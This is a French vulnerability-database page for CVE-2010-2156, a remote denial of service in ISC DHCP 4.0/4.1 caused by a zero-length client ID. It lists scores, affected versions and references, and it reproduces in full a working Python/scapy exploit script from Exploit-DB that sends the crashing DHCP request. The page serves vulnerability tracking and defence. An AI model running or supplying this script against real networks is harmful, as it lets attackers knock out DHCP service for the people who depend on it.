CVE-2010-2156 : Détail

CVE-2010-2156

96.54%V3
Network
2010-06-07
11h38 +00:00
2017-08-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 14185

Date de publication : 2010-07-02 22h00 +00:00
Auteur : sid
EDB Vérifié : No

#!/usr/bin/env python # Exploit title: isc-dhcpd DoS # Date: 03/07/2010 # Author: sid # Software Link: https://www.isc.org/software/dhcp # Version: 4.0.x, 4.1.x, 4.2.x # CVE: cve-2010-2156 # ps: is possible make a bruteforce on subnet ip address to find a correct value. # import sys import string if len(sys.argv) is 1: print("Usage: " + sys.argv[0] + "-ip=<legal ip in subnet>") print("Example: " + sys.argv[0] + " -ip=192.168.1.100") sys.exit(0) for i in range(len(sys.argv)): if string.find(sys.argv[i],"-ip") is 0: globals()['ip'] = sys.argv[i].split('=')[1] from scapy.all import * globals()['verbose'] = 2 def msg(string, level): if globals()['verbose'] >= level: print(string) msg("attack...",2) p=(Ether(src="aa:aa:aa:aa:aa:aa",dst="ff:ff:ff:ff:ff:ff")/IP(dst="255.255.255.255")/UDP(sport=68,dport=67)/ BOOTP(ciaddr=globals()['ip'],chaddr="\xaa\xaa\xaa\xaa\xaa\xaa")/ DHCP(options=[("message-type","request"),("client_id",""),("end")])) if p: p.show() sendp(p) #EOF

Products Mentioned

Configuraton 0

Isc>>Dhcp >> Version 4.1.0

Isc>>Dhcp >> Version 4.1.1

Isc>>Dhcp >> Version 4.1.1

Isc>>Dhcp >> Version 4.1.1

Isc>>Dhcp >> Version 4.1.1

Isc>>Dhcp >> Version 4.1.1

Configuraton 0

Isc>>Dhcp >> Version 4.0.0

Isc>>Dhcp >> Version 4.0.1

Isc>>Dhcp >> Version 4.0.1

Isc>>Dhcp >> Version 4.0.1

Isc>>Dhcp >> Version 4.0.2

Isc>>Dhcp >> Version 4.0.2

Isc>>Dhcp >> Version 4.0.2

Isc>>Dhcp >> Version 4.0.2

Isc>>Dhcp >> Version 4.0.2

Références

http://www.mandriva.com/security/advisories?name=MDVSA-2010:114
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/40116
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/40775
Tags : vdb-entry, x_refsource_BID
http://www.exploit-db.com/exploits/14185
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securitytracker.com/id?1024093
Tags : vdb-entry, x_refsource_SECTRACK